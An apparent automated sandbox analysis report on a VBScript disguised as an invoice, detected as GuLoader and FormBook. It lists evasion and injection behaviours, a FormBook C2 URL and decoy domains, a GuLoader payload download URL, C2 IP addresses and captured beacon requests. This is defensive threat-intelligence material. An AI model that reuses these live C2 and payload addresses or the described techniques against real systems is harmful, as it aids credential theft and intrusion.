Windows Analysis Report
WWVN_INVOICE_8363567453.vbs

Overview

General Information

Sample Name: WWVN_INVOICE_8363567453.vbs
Analysis ID: 623396
MD5: 9f8e253fd51c33a2f874942ebc0d3795
SHA1: 6868a9005489e56542cf0df063985132fef50f3d
SHA256: c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.shantelleketodietofficial.site/wn19/"], "decoy": ["intelios.xyz", "fungismartgrid.com", "wrsngh.com", "golatrak.com", "revboxx.com", "projectduckling.com", "yiwuanyi.com", "bellaigo.com", "rnrr.xyz", "dentalimplantsservicelk.com", "helixsaleep.com", "hokasneakeruse.xyz", "threads34.store", "ayanaslifeinmalaysia.com", "thebeautystore.store", "99221.net", "mc3.xyz", "coconsj.store", "abstractmouse.com", "bctp.xyz", "sura.ooo", "paradisetrippielagoon.com", "usnahrpc.com", "kbcoastalproperties.com", "whiskeyjr.com", "liesdevocalist.store", "schnellekreditfinanz.com", "katraderphotography.com", "guizhouwentuo.com", "tfp3gfekbrb9cx99.xyz", "reionsbank.com", "edwardfran.com", "grigorous.com", "linqxw.com", "proplanvetsdirect.com", "zildaalckmin.net", "herbalsfixng.xyz", "gpusforfun.com", "terra-stations.money", "anytoearn.com", "borneadomicile.com", "dtmkwd.sbs", "taakyif.com", "perrobravostudio.com", "limba6lamb.xyz", "gluideline.com", "travelchanel3d.com", "group-gr.com", "qcrcmh.com", "dujh.xyz", "screensunshincoust.com", "cnrhome.com", "getsuzamtir.xyz", "baseballportalusa.com", "laiwu-yulu.com", "repaircilinic.com", "nelvashop.com", "2228.wtf", "clickleaser.com", "jpfzaojyn.sbs", "tandelawnmaintenance.com", "actu-infomail.com", "m-a-a.xyz", "friendlyneighborholdings.com"]}
Source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
Multi AV Scanner detection for submitted file
Source: WWVN_INVOICE_8363567453.vbs ReversingLabs: Detection: 24%
Yara detected FormBook
Source: Yara match File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Source: Binary string: chkdsk.pdbGCTL source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ieinstal.pdb source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: $2l8C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: chkdsk.pdb source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1816473649.0000000008901000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop esi 32_2_0071730D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop ebx 32_2_00707B1C

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 68.65.122.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.18 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 209.99.40.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.192.29.215 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 180.76.247.231 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.171 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.23.49.173 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2842115 ETPRO TROJAN MalDoc Requesting Payload 2020-04-21 192.168.11.20:49759 -> 203.170.86.89:80
Potential malicious VBS script found (has network functionality)
Source: Initial file: Than21.SaveToFile FileName, adSaveCreateOverWrite
Performs DNS queries to domains with low reputation
Source: DNS query: www.dujh.xyz
Source: DNS query: www.dujh.xyz
Source: DNS query: www.getsuzamtir.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.shantelleketodietofficial.site/wn19/
Source: Malware configuration extractor URLs: http://barsam.com.au/bin_FCWtLoO90.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp HTTP/1.1Host: www.borneadomicile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp HTTP/1.1Host: www.clickleaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp HTTP/1.1Host: www.repaircilinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp HTTP/1.1Host: www.linqxw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 217.160.0.18 217.160.0.18
Source: Joe Sandbox View IP Address: 209.99.40.222 209.99.40.222
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Tue, 10 May 2022 12:25:21 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 May 2022 12:25:23 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 May 2022 12:26:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.clickleaser.com/wp-json/>; rel="https://api.w.org/"Vary: User-AgentConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 27 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 43 6c 69 63 6b 20 4c 65 61 73 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 May 2022 12:26:47 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 65 74 73 75 7a 61 6d 74 69 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.getsuzamtir.xyz Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 10 May 2022 12:27:25 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: ieinstal.exe, 0000001B.00000002.1969523005.0000000003384000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bin
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bin4
Source: ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binC:
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binf
Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bink
Source: ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binzs
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
